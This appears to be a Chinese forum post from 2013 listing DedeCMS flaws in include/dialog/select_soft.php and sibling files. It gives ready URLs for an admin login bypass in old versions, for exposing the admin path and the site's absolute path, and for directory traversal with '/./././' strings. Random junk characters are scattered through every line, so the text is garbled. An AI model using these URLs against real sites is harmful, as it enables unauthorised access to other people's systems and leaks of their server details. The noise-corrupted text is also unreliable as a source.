1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理1 _7 e, n( l% o% S: D
# \# v& U6 h8 U0 j# [: ~- t! R% v员帐号,新版本的就直接转向了后台.
3 H/ {1 K# x# U! X3 n2 K' V6 c6 s" p; h2 [9 ]# a4 i9 `
2.include/dialog/config.php会爆出后台管理路径% u; d2 f6 o+ ^, T% i6 P9 C
) m0 ^, C$ m5 C$ q) {0 k2 l
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录5 M- S) m0 V1 e0 M3 L
5 d$ `2 g3 ?0 l4 r4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
% u6 w4 e) Y* y, ^/ M
* u( T' X+ V4 @( y5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
, P8 o9 w# @. \: w; J: J1 c6 G3 b* h
到根目录去.不过这些版本的访问地址有些不同. c5 g2 H% y- V# ]8 x
地址为require/dialog/select_soft.php?activepath=/././././././././
, c) E7 V9 ^; Z4 ^/ C. z8 \# L( Q" t
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..# M c, o0 u. x) t
存在相同问题的文件还有
/ D1 Y- T1 U# u. {include\dialog\select_images.php2 e! p* a/ f2 D
include\dialog\select_media.php5 V9 m6 i. S% e# V- c" E! K3 P
include\dialog\select_templets.php6 Z. U- R5 M8 ^2 m7 l4 P6 ^
|
发表于 2013-4-16 16:50:43
收藏
支持
反对